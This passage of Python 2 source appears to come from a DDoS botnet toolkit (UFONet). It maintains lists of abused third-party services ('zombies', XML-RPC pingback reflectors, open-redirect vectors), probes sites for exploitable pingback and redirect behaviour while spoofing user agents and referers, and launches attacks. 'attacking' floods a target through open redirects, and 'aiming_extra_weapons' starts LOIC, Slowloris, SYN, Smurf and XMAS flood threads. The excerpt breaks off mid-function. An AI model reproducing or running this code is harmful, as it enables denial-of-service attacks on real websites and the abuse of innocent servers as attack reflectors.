 2960. print "[Info] [AI] [Control] Cannot open [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]"
 2961. return
 2962. else:
 2963. print "[Info] [AI] [Control] Cannot found [X-RPCs] from: 'botnet/rpcs.txt' [Discarding!]"
 2964. return
 2965. def extract_zombies(self):
 2966. options = self.options
 2967. if self.options.test:
 2968. try:
 2969. f = open(options.test)
 2970. zombies = f.readlines()
 2971. zombies = [ zombie.replace('\n','') for zombie in zombies ]
 2972. f.close()
 2973. if not zombies:
 2974. print "\n[Error] [AI] [Control] Cannot retrieve [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n"
 2975. return
 2976. else:
 2977. return zombies
 2978. except:
 2979. if os.path.exists(options.test) == True:
 2980. print "\n[Error [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n"
 2981. return #sys.exit(2)
 2982. else:
 2983. print "\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n"
 2984. return #sys.exit(2)
 2985. else:
 2986. try:
 2987. f = open(self.zombies_file)
 2988. zombies = f.readlines()
 2989. zombies = [ zombie.replace('\n','') for zombie in zombies ]
 2990. f.close()
 2991. if not zombies:
 2992. print "\n[Error] [AI] You haven't [Zombies] to be extracted from: 'botnet/zombies.txt' -> [Aborting!]\n"
 2993. return
 2994. else:
 2995. return zombies
 2996. except:
 2997. if os.path.exists(self.zombies_file) == True:
 2998. print "\n[Error] [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n"
 2999. return #sys.exit(2)
 3000. else:
 3001. print "\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n"
 3002. return #sys.exit(2)
 3003. def extract_target_list(self):
 3004. options = self.options
 3005. try:
 3006. f = open(options.target_list)
 3007. targets = f.readlines()
 3008. targets = [ target.replace('\n','') for target in targets ]
 3009. f.close()
 3010. if not targets:
 3011. print "\n[Error] [AI] [Control] Cannot retrieve [Targets] from: '"+options.target_list+"' -> [Aborting!]\n"
 3012. return
 3013. else:
 3014. return targets
 3015. except:
 3016. if os.path.exists(options.target_list) == True:
 3017. print "\n[Error] [AI] [Control] Cannot found [Targets] from: '"+options.target_list+"' -> [Aborting!]\n"
 3018. return #sys.exit(2)
 3019. else:
 3020. print "\n[Error] [AI] [Control] Cannot open [Targets] from: '"+options.target_list+"' -> [Aborting!]\n"
 3021. return #sys.exit(2)
 3022. def update_zombies(self, zombies_ready):
 3023. # update zombies on file
 3024. options = self.options
 3025. if options.attackme:
 3026. f = open(self.zombies_file, "w") # re-write list
 3027. for zombie in self.doll.real_zombies: # add only alien verified zombies
 3028. for x in zombie:
 3029. f.write(str(x) + os.linesep)
 3030. f.close()
 3031. if options.test or options.testall:
 3032. if not options.test:
 3033. options.test = self.zombies_file
 3034. f = open(options.test, "w") # re-write list only with zombies ready
 3035. for zombie in zombies_ready:
 3036. f.write(zombie + os.linesep)
 3037. f.close()
 3038. if options.search or options.dorks or options.autosearch or options.download: # append only new zombies to list (dorking supported)
 3039. f = open(self.zombies_file)
 3040. zombies_on_file = f.read().splitlines()
 3041. with open(self.zombies_file, "a") as zombie_list:
 3042. for zombie in zombies_ready:
 3043. if zombie not in zombies_on_file: # parse possible repetitions
 3044. zombie_list.write(zombie + os.linesep)
 3045. if options.download:
 3046. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 3047. else:
 3048. self.scanned_zombies = self.scanned_zombies + 1 # update scanner stats only with new zombies (dorking)
 3049. f.close()
 3050. def update_aliens(self, aliens_ready):
 3051. # update aliens on file
 3052. options = self.options
 3053. if options.download: # append only new aliens to list
 3054. f = open(self.aliens_file)
 3055. aliens_on_file = f.read().splitlines()
 3056. with open(self.aliens_file, "a") as alien_list:
 3057. for alien in aliens_ready:
 3058. if alien not in aliens_on_file: # parse possible repetitions
 3059. alien_list.write(alien + os.linesep)
 3060. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 3061. f.close()
 3062. def update_droids(self, droids_ready):
 3063. # update droids on file
 3064. options = self.options
 3065. if options.download: # append only new droids to list
 3066. f = open(self.droids_file)
 3067. droids_on_file = f.read().splitlines()
 3068. with open(self.droids_file, "a") as droid_list:
 3069. for droid in droids_ready:
 3070. if droid not in droids_on_file: # parse possible repetitions
 3071. droid_list.write(droid + os.linesep)
 3072. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 3073. f.close()
 3074. def update_ucavs(self, ucavs_ready):
 3075. # update ucavs on file
 3076. options = self.options
 3077. if options.download: # append only new ucavs to list
 3078. f = open(self.ucavs_file)
 3079. ucavs_on_file = f.read().splitlines()
 3080. with open(self.ucavs_file, "a") as ucav_list:
 3081. for ucav in ucavs_ready:
 3082. if ucav not in ucavs_on_file: # parse possible repetitions
 3083. ucav_list.write(ucav + os.linesep)
 3084. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 3085. f.close()
 3086. def update_rpcs(self, rpcs_ready):
 3087. # update rpcs on file
 3088. options = self.options
 3089. if options.testrpc or options.testall:
 3090. f = open(self.rpcs_file, "w") # re-write list
 3091. for rpc in rpcs_ready: # add only rpc verified zombies
 3092. f.write(rpc + os.linesep)
 3093. f.close()
 3094. if options.download: # append only new rpcs to list
 3095. f = open(self.rpcs_file)
 3096. rpcs_on_file = f.read().splitlines()
 3097. with open(self.rpcs_file, "a") as rpc_list:
 3098. for rpc in rpcs_ready:
 3099. if rpc not in rpcs_on_file: # parse possible repetitions
 3100. rpc_list.write(rpc + os.linesep)
 3101. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 3102. f.close()
 3103. def search_rpc(self, rpc_host):
 3104. options = self.options
 3105. rpc_vulnerable = False
 3106. rpc_pingback_url = False
 3107. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 3108. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 3109. try:
 3110. if self.options.testall: # testing_all
 3111. if options.proxy: # set proxy
 3112. self.proxy_transport(options.proxy)
 3113. req = urllib2.Request(rpc_host, None, headers)
 3114. rpc_code = urllib2.urlopen(req, context=self.ctx).read()
 3115. rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
 3116. for link in rpc_links:
 3117. if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
 3118. rpc_pingback_url = link[0]
 3119. rpc_vulnerable = True
 3120. break # found it!
 3121. else: # not any XML-RPC discovering methods are working
 3122. rpc_pingback_url = rpc_host + "/xmlrpc.php"
 3123. rpc_vulnerable = False
 3124. else:
 3125. if rpc_host.startswith("http://"):
 3126. rpc_host = rpc_host.replace("http://", "")
 3127. if rpc_host.startswith("https://"):
 3128. rpc_host = rpc_host.replace("https://", "")
 3129. rpc_host = urlparse(rpc_host)
 3130. rpc_path = rpc_host.path.replace("\r", "")
 3131. self.head = True # send HTTP HEAD request searching for: X-Pingback
 3132. reply = self.connect_zombie(rpc_path)
 3133. self.head = False
 3134. if "X-Pingback" in reply: # discovering pingback-enabled resources
 3135. m = re.search('X-Pingback: (.+?)\n', reply) # regex magics
 3136. rpc_pingback_url = m.group(1) # extract rpc server url
 3137. rpc_vulnerable = True
 3138. else: # not X-Pingback on HTTP Headers (search for <link rel="pingback"... on HTML/XHTML code)
 3139. if options.proxy: # set proxy
 3140. self.proxy_transport(options.proxy)
 3141. req_rpc = urllib2.Request(rpc_host, None, headers)
 3142. req_rpc.get_method = lambda : 'GET'
 3143. rpc_code = urllib2.urlopen(req_rpc, context=self.ctx).read()
 3144. rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
 3145. for link in rpc_links:
 3146. if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
 3147. rpc_pingback_url = link[0]
 3148. rpc_vulnerable = True
 3149. break # found it!
 3150. else: # not any XML-RPC discovering methods are working
 3151. rpc_pingback_url = rpc_host + "/xmlrpc.php"
 3152. rpc_vulnerable = False
 3153. except: # something wrong discovering XML-RPC Pingback
 3154. pass
 3155. return rpc_vulnerable, rpc_pingback_url
 3156. def testing_offline(self):
 3157. # check for zombies offline
 3158. print ("\nChecking for [Zombies] offline!\n")
 3159. print '='*35
 3160. zombies_online = 0
 3161. zombies_offline = 0
 3162. zombies = self.extract_zombies()
 3163. rpcs = self.extract_rpcs()
 3164. aliens = self.extract_aliens()
 3165. droids = self.extract_droids()
 3166. ucavs = self.extract_ucavs()
 3167. try:
 3168. botnet = zombies + rpcs + aliens + droids + ucavs
 3169. except:
 3170. return
 3171. discarded = [] # for discarded zombies
 3172. if not botnet:
 3173. return
 3174. self.head = True
 3175. for zombie in botnet:
 3176. zombie = str(zombie)
 3177. if zombie in zombies: # set zombie type (this way because cannot be same zombie with different type)
 3178. zombie_type = 'Zombie'
 3179. elif zombie in rpcs:
 3180. zombie_type = 'XML-RPC'
 3181. elif zombie in aliens:
 3182. zombie_type = 'Alien'
 3183. elif zombie in droids:
 3184. zombie_type = 'Droid'
 3185. elif zombie in ucavs:
 3186. zombie_type = 'UCAV'
 3187. t = urlparse(zombie)
 3188. name_zombie = t.netloc
 3189. if name_zombie == "":
 3190. name_zombie = zombie
 3191. if zombie_type == 'Alien': # [Aliens] are made with keyword ;$POST;
 3192. sep = ';$POST;'
 3193. zombie = zombie.split(sep, 1)[0]
 3194. reply = str(self.connect_zombie(zombie))
 3195. if reply == "200" or reply == "302" or reply == "301" or reply == "401" or reply == "403" or reply == "405" or reply == '500':
 3196. status = "ONLINE!"
 3197. zombies_online = zombies_online + 1
 3198. else:
 3199. status = "NOT Working!"
 3200. zombies_offline = zombies_offline + 1
 3201. print "\nName:", name_zombie
 3202. print "Type: [", zombie_type, "]"
 3203. print "Vector:", zombie
 3204. print "HTTP Code:", reply
 3205. print "STATUS:", status
 3206. print '-'*21
 3207. if status == "NOT Working!": # add to discarded zombies
 3208. if zombie not in discarded:
 3209. discarded.append(zombie)
 3210. print "\n" + '='*52
 3211. print "\n+ Total Botnet:", len(botnet)
 3212. print "\n" + '-'*25 + "\n"
 3213. print " - ONLINE:", zombies_online
 3214. print " - OFFLINE:", zombies_offline, "\n"
 3215. print '='*52 + '\n'
 3216. self.head = False
 3217. if zombies_offline > 0:
 3218. if not self.options.forceyes:
 3219. test_reply = raw_input("[AI] Do you want to update your army? (Y/n)\n")
 3220. print '-'*25 + "\n"
 3221. else:
 3222. test_reply = "Y"
 3223. if test_reply == "n" or test_reply == "N":
 3224. print "[AI] "+self.exit_msg+"\n"
 3225. return
 3226. else:
 3227. disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
 3228. print '='*52
 3229. print "\n - DISCARDED:", disc_zombies
 3230. new_botnet = int(len(botnet) - disc_zombies)
 3231. print "\n+ New Total Botnet:", str(new_botnet), "\n"
 3232. print '='*52 + '\n'
 3233. else:
 3234. print "[Info] [AI] [Control] ALL checked [Zombies] are ONLINE! -> [Exiting!]\n"
 3235. def send_extra_zombies(self):
 3236. # check for extra zombies: aliens, droids, rpcs, ucavs... and start attacking with them
 3237. if not self.options.disablealiens and not self.options.attackme: # different layers requests -> pure web abuse
 3238. if self.options.verbose:
 3239. print "[Info] [AI] [Control] Deploying [Aliens] with heavy 'laser-cannon' weapons..."
 3240. aliens = [self.extract_aliens()] # extract aliens from file to a list
 3241. for a in aliens:
 3242. if a is None:
 3243. self.options.disablealiens = True
 3244. self.total_aliens = 0 # not any alien invoked
 3245. else:
 3246. for s in a: # extract number of aliens
 3247. self.total_aliens = self.total_aliens + 1
 3248. al = threading.Thread(target=self.send_aliens, args=(aliens)) # multithreading to send aliens
 3249. al.start()
 3250. else:
 3251. self.options.disablealiens = True
 3252. self.total_aliens = 0 # not any alien invoked
 3253. if not self.options.disabledroids and not self.options.attackme: # GET (with parameter required) requests
 3254. if self.options.verbose:
 3255. print "[Info] [AI] [Control] Deploying [Droids] with light 'laser-cannon' weapons..."
 3256. droids = [self.extract_droids()] # extract droids from file to a list
 3257. for d in droids:
 3258. if d is None:
 3259. self.options.disabledroids = True
 3260. self.total_droids = 0 # not any droid invoked
 3261. else:
 3262. for s in d: # extract number of droids
 3263. self.total_droids = self.total_droids + 1
 3264. dr = threading.Thread(target=self.send_droids, args=(droids)) # multithreading to send droids
 3265. dr.start()
 3266. else:
 3267. self.options.disabledroids = True
 3268. self.total_droids = 0 # not any droid invoked
 3269. if not self.options.disablerpcs and not self.options.attackme: # exploit XML-RPC pingback vulnerability
 3270. if self.options.verbose:
 3271. print "[Info] [AI] [Control] Deploying [X-RPCs] with 'plasma cannon' weapons..."
 3272. rpcs = [self.extract_rpcs()] # extract rpcs from file to a list
 3273. for r in rpcs:
 3274. if r is None:
 3275. self.options.disablerpcs = True
 3276. self.total_rpcs = 0 # not any rpc invoked
 3277. else:
 3278. for s in r: # extract number of rpcs
 3279. self.total_rpcs = self.total_rpcs + 1
 3280. rp = threading.Thread(target=self.send_rpcs, args=(rpcs)) # multithreading to send rpcs
 3281. rp.start()
 3282. else:
 3283. self.options.disablerpcs = True
 3284. self.total_rpcs = 0 # not any rpcs invoked
 3285. if not self.options.disableucavs and not self.options.attackme: # perform an external 'Is target up?' round check
 3286. if self.options.verbose:
 3287. print "[Info] [AI] [Control] Deploying [UCAVs] with 'heat-beam' weapons and 'status check' scanners..."
 3288. ucavs = [self.extract_ucavs()] # extract ucavs from file to a list
 3289. for u in ucavs:
 3290. if u is None:
 3291. self.options.disableucavs = True
 3292. self.total_ucavs = 0 # not any ucav invoked
 3293. else:
 3294. for s in u: # extract number of ucavs
 3295. self.total_ucavs = self.total_ucavs + 1
 3296. uc = threading.Thread(target=self.send_ucavs, args=(ucavs)) # multithreading to send ucavs
 3297. uc.start()
 3298. else:
 3299. self.options.disableucavs = True
 3300. self.total_ucavs = 0 # not any ucavs invoked
 3301. def abandoning_zombies(self):
 3302. if self.options.expire: # set timing for purge
 3303. try:
 3304. timing = int(self.options.expire)
 3305. except:
 3306. timing = self.expire_timing # default timing for purge
 3307. else:
 3308. timing = self.expire_timing # default timing for purge
 3309. if timing < 1:
 3310. timing = self.expire_timing # default timing for purge
 3311. zombies_arrival_timing = timing # timing = trying to control round time for threading flow
 3312. zombies_lock = 0
 3313. if self.options.verbose:
 3314. print "[Info] [AI] [Control] Setting ["+str(zombies_arrival_timing)+"] per round for [Zombies] to return..."
 3315. while self.herd.no_more_zombies() == False: # abandoning -controller- zombies
 3316. zombies_lock = zombies_lock + 1
 3317. if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
 3318. if self.options.verbose:
 3319. print "\n[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]"
 3320. break
 3321. else:
 3322. time.sleep(1)
 3323. def discard_zombies(self, discarded):
 3324. disc_zombies = 0
 3325. if self.options.testoffline:
 3326. zombies_list = [self.zombies_file, self.aliens_file, self.droids_file, self.ucavs_file, self.rpcs_file]
 3327. else:
 3328. zombies_list = [self.zombies_file]
 3329. if not self.options.disablealiens: # add aliens
 3330. zombies_list.append(self.aliens_file)
 3331. if not self.options.disabledroids: # add droids
 3332. zombies_list.append(self.droids_file)
 3333. if not self.options.disablerpcs: # add rpcs
 3334. zombies_list.append(self.rpcs_file)
 3335. if not self.options.disableucavs: # add ucavs
 3336. zombies_list.append(self.ucavs_file)
 3337. for l in zombies_list:
 3338. f = open(l, "r+")
 3339. d = f.readlines()
 3340. f.close()
 3341. f = open(l, "w")
 3342. disc_zombies = self.remove_discarded_zombies(f, d, discarded, disc_zombies)
 3343. f.close()
 3344. return disc_zombies
 3345. def remove_discarded_zombies(self, f, d, discarded, disc_zombies):
 3346. m = []
 3347. for zombie in d:
 3348. if zombie not in discarded == True:
 3349. m.append(zombie) # save it
 3350. else:
 3351. disc_zombies = disc_zombies + 1
 3352. if not m:
 3353. f.write("")
 3354. else:
 3355. for z in m:
 3356. f.write(z+os.linesep)
 3357. return disc_zombies
 3358. def testing_rpcs(self, rpcs):
 3359. # discover/test XML-RPC Pingback vulnerabilities on webapps (Wordpress, Drupal, PostNuke, b2evolution,
 3360. # Xoops, PHPGroupWare, TikiWiki, etc...) and update list
 3361. options = self.options
 3362. if self.options.testall: #testing_all
 3363. print '='*51
 3364. print ("Are 'plasma' reflectors ready? :-) (XML-RPC Check):")
 3365. print '='*51
 3366. num_active_rpcs = 0
 3367. num_failed_rpcs = 0
 3368. rpcs_ready = []
 3369. print "Trying:", len(rpcs)
 3370. print '-'*21
 3371. for rpc in rpcs:
 3372. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 3373. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 3374. if rpc.startswith("http://") or rpc.startswith("https://"):
 3375. print "[Info] [X-RPCs] Searching 'Pingback' on", rpc
 3376. rpc_host = rpc.replace("/xmlrpc.php", "")
 3377. rpc_vulnerable, rpc_pingback_url = self.search_rpc(rpc_host)
 3378. if rpc_vulnerable == True: # discover XML-RPC system.listMethods allowed
 3379. rpc_methods = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
 3380. try:
 3381. if options.proxy: # set proxy
 3382. self.proxy_transport(options.proxy)
 3383. req = urllib2.Request(rpc_pingback_url, rpc_methods, headers)
 3384. target_reply = urllib2.urlopen(req, context=self.ctx).read()
 3385. if self.options.verbose:
 3386. print "[Info] [X-RPCs] Reply:", target_reply
 3387. if "pingback.ping" in target_reply: # XML-RPC pingback.ping method is allowed!
 3388. print "\n[Info] [AI] It looks VULNERABLE! ;-)"
 3389. rpcs_ready.append(rpc_pingback_url) # save XML-RPC path as RPC zombie
 3390. num_active_rpcs = num_active_rpcs + 1 # add fail to rpcs stats
 3391. else:
 3392. print "\n[Info] [AI] It is NOT vulnerable..."
 3393. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
 3394. except:
 3395. print "[Info] [X-RPCs] " + rpc + " -> FAILED (cannot connect!)"
 3396. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
 3397. else:
 3398. print "\n[Info] [AI] It is NOT vulnerable..."
 3399. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
 3400. print '-'*10
 3401. print '='*18
 3402. print "OK:", num_active_rpcs, "Fail:", num_failed_rpcs
 3403. print '='*18
 3404. if self.options.testall: # testing_all
 3405. return rpcs_ready, num_active_rpcs, num_failed_rpcs
 3406. else:
 3407. # update 'rpcs' list
 3408. if num_active_rpcs == 0:
 3409. print "\n[Info] [X-RPCs] Not any vulnerable 'rpc' active!\n"
 3410. return
 3411. else:
 3412. if not self.options.forceyes:
 3413. update_reply = raw_input("[AI] Do you want to update your army? (Y/n)")
 3414. print '-'*25
 3415. else:
 3416. update_reply = "Y"
 3417. if update_reply == "n" or update_reply == "N":
 3418. print "[AI] "+self.exit_msg+"\n"
 3419. return
 3420. else:
 3421. self.update_rpcs(rpcs_ready)
 3422. if not self.options.upload:
 3423. print "\n[Info] [AI] Botnet updated! -> ;-)\n"
 3424. def testing(self, zombies):
 3425. # test Open Redirect vulnerabilities on webapps and show statistics
 3426. # HTTP HEAD check
 3427. army = 0
 3428. print ("Are 'they' alive? :-) (HEAD Check):")
 3429. print '='*35
 3430. num_active_zombies = 0
 3431. num_failed_zombies = 0
 3432. active_zombies = []
 3433. print "Trying:", len(zombies)
 3434. print '-'*21
 3435. for zombie in zombies:
 3436. zombie = str(zombie)
 3437. if zombie.startswith("http://") or zombie.startswith("https://"):
 3438. # send HEAD connection
 3439. self.head = True
 3440. self.connect_zombies(zombie)
 3441. while self.herd.no_more_zombies() == False:
 3442. time.sleep(1)
 3443. for zombie in self.herd.done:
 3444. zombie = str(zombie)
 3445. t = urlparse(zombie)
 3446. if self.herd.get_result(zombie):
 3447. code_reply = self.herd.get_result(zombie)
 3448. self.head = False
 3449. if code_reply == "200" or code_reply == "302" or code_reply == "301" or code_reply == "401" or code_reply == "403" or code_reply == "405":
 3450. name_zombie = t.netloc
 3451. if name_zombie == "":
 3452. name_zombie = zombie
 3453. print "Zombie:", name_zombie
 3454. print "Status: OK ["+ code_reply + "]"
 3455. num_active_zombies = num_active_zombies + 1
 3456. active_zombies.append(zombie)
 3457. elif code_reply == "404":
 3458. print "Zombie:", t.netloc
 3459. print "Status: Not Found ["+ code_reply + "]"
 3460. num_failed_zombies = num_failed_zombies + 1
 3461. else:
 3462. print "Zombie:", t.netloc, "\nVector:", zombie
 3463. print "Status: Not Allowed ["+ code_reply + "]"
 3464. num_failed_zombies = num_failed_zombies + 1
 3465. else:
 3466. if self.options.verbose:
 3467. print "[Info] [Zombies] Reply:", "\n\nNothing!!!!!\n"
 3468. print "Zombie:", zombie
 3469. print "Status: Malformed!"
 3470. num_failed_zombies = num_failed_zombies + 1
 3471. print '-'*10
 3472. self.herd.reset()
 3473. print '='*18
 3474. print "OK:", num_active_zombies, "Fail:", num_failed_zombies
 3475. print '='*18 + "\n"
 3476. print '='*22
 3477. if num_active_zombies > 0:
 3478. # check url parameter vectors
 3479. print ("Checking for payloads:")
 3480. print '='*22
 3481. print "Trying:", num_active_zombies
 3482. print '-'*21
 3483. zombies_ready = []
 3484. num_waiting_zombies = 0
 3485. if num_active_zombies == 0:
 3486. num_disconnected_zombies = num_failed_zombies
 3487. else:
 3488. num_disconnected_zombies = 0
 3489. for zombie in active_zombies:
 3490. zombie = str(zombie)
 3491. t = urlparse(zombie)
 3492. name_zombie = t.netloc
 3493. if name_zombie == "":
 3494. name_zombie = zombie
 3495. self.payload = True
 3496. self.connect_zombies(zombie)
 3497. self.payload = False
 3498. while self.herd.no_more_zombies() == False:
 3499. time.sleep(1)
 3500. for zombie in self.herd.done:
 3501. zombie = str(zombie)
 3502. t = urlparse(zombie)
 3503. name_zombie = t.netloc
 3504. if name_zombie == "":
 3505. name_zombie = zombie
 3506. payload_zombie = zombie
 3507. payload_reply = ""
 3508. print "Vector:", payload_zombie
 3509. self.payload = True
 3510. if self.herd.get_result(zombie):
 3511. payload_reply = self.herd.get_result(zombie)
 3512. self.payload = False
 3513. if "https://www.whitehouse.gov" in payload_reply: #Open Redirect reply [requested by all UFONet motherships ;-)]
 3514. num_waiting_zombies = num_waiting_zombies + 1
 3515. print "Status:", "Waiting for orders... ;-)"
 3516. zombies_ready.append(zombie)
 3517. else:
 3518. num_disconnected_zombies = num_disconnected_zombies + 1
 3519. print "Status:", "Not ready..."
 3520. army = army + 1
 3521. print '-'*10
 3522. self.herd.reset()
 3523. print '='*18
 3524. print "OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies
 3525. print '='*18 + "\n"
 3526. # list of [Zombies] ready to attack
 3527. num_active_zombie = 0
 3528. for z in zombies_ready:
 3529. t = urlparse(z)
 3530. name_zombie = t.netloc
 3531. if name_zombie == "":
 3532. name_zombie = z
 3533. num_active_zombie = num_active_zombie + 1
 3534. if self.options.verbose:
 3535. print "Zombie [", num_active_zombie, "]:", name_zombie + "\n"
 3536. if self.options.testall: # testing_all
 3537. return zombies_ready, num_waiting_zombies, num_disconnected_zombies + num_failed_zombies
 3538. else:
 3539. print '-'*25 + "\n"
 3540. print '='*24
 3541. print "Working [Zombies]:", num_active_zombie
 3542. print '='*24
 3543. if not self.options.forceyes:
 3544. update_reply = raw_input("\n[AI] Do you want to update your army? (Y/n)")
 3545. print '-'*25
 3546. else:
 3547. update_reply = "Y"
 3548. if update_reply == "n" or update_reply == "N":
 3549. print "[AI] "+self.exit_msg+"\n"
 3550. return
 3551. else:
 3552. self.update_zombies(zombies_ready)
 3553. if not self.options.upload:
 3554. print "\n[Info] [AI] Botnet updated! -> ;-)\n"
 3555. self.update_scanner_stats(self.scanned_zombies) # update json file with scanner stats (found via dorking)
 3556. else:
 3557. print '-'*25 + "\n"
 3558. print '='*24
 3559. print "Working [Zombies]:", num_active_zombies
 3560. print '='*24
 3561. print "\n[Info] [AI] [Zombies] aren't replying to your HEAD check! -> [Exiting!]\n"
 3562. def testing_all(self):
 3563. # test whole botnet
 3564. print ("\nChecking if [Zombies] are still infected (WARNING: this may take serveral time!)\n")
 3565. print '='*35
 3566. zombies = self.extract_zombies()
 3567. rpcs = self.extract_rpcs()
 3568. aliens = self.extract_aliens()
 3569. droids = self.extract_droids()
 3570. ucavs = self.extract_ucavs()
 3571. try:
 3572. botnet = zombies + rpcs + aliens + droids + ucavs
 3573. tested_zombies = zombies + rpcs # test types supported: zombies + xml-rpcs
 3574. except:
 3575. return
 3576. zombies_ready, num_waiting_zombies, num_disconnected_zombies = self.testing(zombies)
 3577. rpcs_ready, num_active_rpcs, num_failed_rpcs = self.testing_rpcs(rpcs)
 3578. print "\n" + '='*52
 3579. print "\n+ Total Botnet:", len(botnet)
 3580. print "\n" + '-'*25
 3581. print "\n+ Total Tested:", len(tested_zombies)
 3582. print "\n - Zombies :", len(zombies), " [ OK:", str(num_waiting_zombies), "| FAILED:", str(num_disconnected_zombies), "]"
 3583. print " - XML-RPCs:", len(rpcs), " [ OK:", str(num_active_rpcs), "| FAILED:", str(num_failed_rpcs), "]" + "\n"
 3584. print '='*52 + '\n'
 3585. if num_disconnected_zombies > 0 or num_failed_rpcs > 0:
 3586. if not self.options.forceyes:
 3587. update_reply = raw_input("[AI] Do you want update your army? (Y/n)")
 3588. print '-'*25
 3589. else:
 3590. update_reply = "Y"
 3591. if update_reply == "n" or update_reply == "N":
 3592. print "[AI] "+self.exit_msg+"\n"
 3593. return
 3594. else:
 3595. if num_disconnected_zombies > 0:
 3596. self.update_zombies(zombies_ready)
 3597. if num_failed_rpcs > 0:
 3598. self.update_rpcs(rpcs_ready)
 3599. if not self.options.upload:
 3600. print "\n[Info] [AI] Botnet updated! -> ;-)\n"
 3601. else:
 3602. print "[Info] [AI] [Control] ALL tested [Zombies] are working! ;-) -> [Exiting!]\n"
 3603. def attacking(self, zombies, target):
 3604. # perform a DDoS Web attack using Open Redirect vectors (and other Web Abuse services) as [Zombies]
 3605. if self.options.forcessl:
 3606. if target.startswith("http://"):
 3607. target = target.replace("http://", "https://") # force SSL/TLS
 3608. if target.startswith("http://") or target.startswith("https://"):
 3609. print "Attacking:", target
 3610. print '='*55, "\n"
 3611. # send Open Redirect injection (multiple zombies > one target url)
 3612. reply = self.injection(target, zombies)
 3613. else:
 3614. print "\n[Error] [AI] Target not valid: "+target+" -> [Discarding!]\n"
 3615. def aiming_extra_weapons(self, target, proxy, loic, loris, ufosyn, spray, smurf, xmas, nuke, tachyon):
 3616. # perform some other extra attacks (such as DoS techniques)
 3617. time.sleep(2) # aiming (multi-threading flow time compensation)
 3618. if loic:
 3619. try:
 3620. self.options.loic = int(loic)
 3621. except:
 3622. self.options.loic = 100 # default LOIC requests
 3623. if self.options.loic < 1:
 3624. self.options.loic = 100
 3625. self.instance = LOIC() # instance main class for LOIC operations
 3626. t = threading.Thread(target=self.instance.attacking, args=(target, self.options.loic, proxy)) # LOIC using threads + proxy
 3627. t.daemon = True # extra weapons are threaded as daemons
 3628. t.start()
 3629. self.update_loic_stats() # add new LOIC attack to mothership stats
 3630. if loris:
 3631. try:
 3632. self.options.loris = int(loris)
 3633. except:
 3634. self.options.loris = 101 # default LORIS requests (apache -> max_clients: ~100 | nginx -> no limit (other method))
 3635. if self.options.loris < 1:
 3636. self.options.loris = 101
 3637. self.instance = LORIS() # instance main class for LORIS operations
 3638. t2 = threading.Thread(target=self.instance.attacking, args=(target, self.options.loris)) # LORIS using threads
 3639. t2.daemon = True
 3640. t2.start()
 3641. self.update_loris_stats() # add new LORIS attack to mothership stats
 3642. if ufosyn:
 3643. try:
 3644. self.options.ufosyn = int(ufosyn)
 3645. except:
 3646. self.options.ufosyn = 100 # default UFOSYN requests
 3647. if self.options.ufosyn < 1:
 3648. self.options.ufosyn = 100
 3649. self.instance = UFOSYN() # instance main class for UFOSYN operations
 3650. t3 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufosyn)) # UFOSYN using threads
 3651. t3.daemon = True
 3652. t3.start()
 3653. self.update_ufosyn_stats() # add new UFOSYN attack to mothership stats
 3654. if spray:
 3655. try:
 3656. self.options.spray = int(spray)
 3657. except:
 3658. self.options.spray = 100 # default SPRAY requests
 3659. if self.options.spray < 1:
 3660. self.options.spray = 100
 3661. self.instance = SPRAY() # instance main class for SPRAY operations
 3662. t4 = threading.Thread(target=self.instance.attacking, args=(target, self.options.spray)) # SPRAY using threads
 3663. t4.daemon = True
 3664. t4.start()
 3665. self.update_spray_stats() # add new SPRAY attack to mothership stats
 3666. if smurf:
 3667. try:
 3668. self.options.smurf = int(smurf)
 3669. except:
 3670. self.options.smurf = 101 # default SMURF requests
 3671. if self.options.smurf < 1:
 3672. self.options.smurf = 101
 3673. self.instance = SMURF() # instance main class for SMURF operations
 3674. t5 = threading.Thread(target=self.instance.attacking, args=(target, self.options.smurf)) # SMURF using threads
 3675. t5.daemon = True
 3676. t5.start()
 3677. self.update_smurf_stats() # add new SMURF attack to mothership stats
 3678. if xmas:
 3679. try:
 3680. self.options.xmas = int(xmas)
 3681. except:
 3682. self.options.xmas = 101 # default XMAS requests
 3683. if self.options.xmas < 1:
 3684. self.options.xmas = 101
 3685. self.instance = XMAS() # instance main class for XMAS operations
 3686. t6 = threading.Thread(target=self.instance.attacking, args=(target, self.options.xmas)) # XMAS using threads
 3687. t6.daemon = True
 3688. t6.start()
 3689. self.update_xmas_stats() # add new XMAS attack to mothership stats
 3690. if nuke:
 3691. if sys.platform == "linux" or sys.platform == "linux2":
 3692. try:
 3693. self.options.nuke = int(nuke)
 3694. except:
 3695. self.options.nuke = 10000 # default NUKE requests
